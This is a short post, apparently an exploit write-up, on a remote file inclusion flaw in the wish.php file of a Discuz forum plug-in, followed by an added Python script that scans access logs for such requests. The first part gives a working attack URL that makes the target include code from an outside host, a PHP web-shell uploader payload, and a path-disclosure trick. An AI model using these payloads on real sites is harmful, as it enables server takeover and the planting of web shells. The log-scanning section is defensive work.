Problems with the wish.php file of the wishing pool plug-in:
require $discuz_root.'./include/discuzcode.func.php';
Manual use:
Remote file inclusion vulnerability. The discuz_root variable is not strictly filtered. Usage:
http://URL/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
The .txt suffix is not required; you can change it to any suffix. You must add the trailing question mark, so that the appended ./include/discuzcode.func.php becomes a query string on the remote URL.
Here, xxxx.txt writes a shell using the pony from CN.Tink:
<?copy($_FILES[myfile][tmp_name],"C:\Inetpub\vhosts\Baidu.com\BBS\guizai.php");?>
<form enctype="multipart/form-data" action="" method="post">
<input name="myfile" type="file">
<input value="Submit" type="submit">
</form>
The website's physical path can be obtained by submitting http://URL/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt and reading the error message; then modify the path in xxxx.txt to match. guizai.php is the name of the shell you uploaded.
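
For defenders, the request shape described above is easy to find in web server access logs, because the include root should never be supplied by the client at all. The following Python sketch is an added example, not part of the original post or the plug-in; the log lines, host names and the scan function are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines (not from the page); hosts are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2008:10:00:00 +0000] "GET /bbs/wish.php?'
    'discuz_root=http://files.example/xxxx.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2008:10:00:05 +0000] "GET /bbs/wish.php?'
    'discuz_root=http%3A%2F%2Ffiles.example%2Fxxxx.jpg%3F HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2008:10:01:00 +0000] "GET /bbs/wish.php?'
    'action=list HTTP/1.1" 200 2048',
    '198.51.100.9 - - [01/Jan/2008:10:02:00 +0000] "POST /bbs/wish.php?'
    'page=2&discuz_root=./ HTTP/1.1" 200 1024',
]

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.I)


def scan(lines, script='wish.php', param='discuz_root'):
    """Return (ip, severity, decoded_value) for each request supplying param."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path, _, query = m.group('target').partition('?')
        if path.rsplit('/', 1)[-1].lower() != script:
            continue
        # parse_qsl percent-decodes, so encoded URLs are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() != param:
                continue
            # Any client-supplied include root is suspicious; a URL value
            # is the remote-inclusion form described above.
            remote = REMOTE_RE.match(value)
            severity = 'remote-include' if remote else 'root-override'
            hits.append((m.group('ip'), severity, value))
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

This only sees the query string; a value sent in a POST body or cookie would need request-body logging or a WAF rule on the same parameter name.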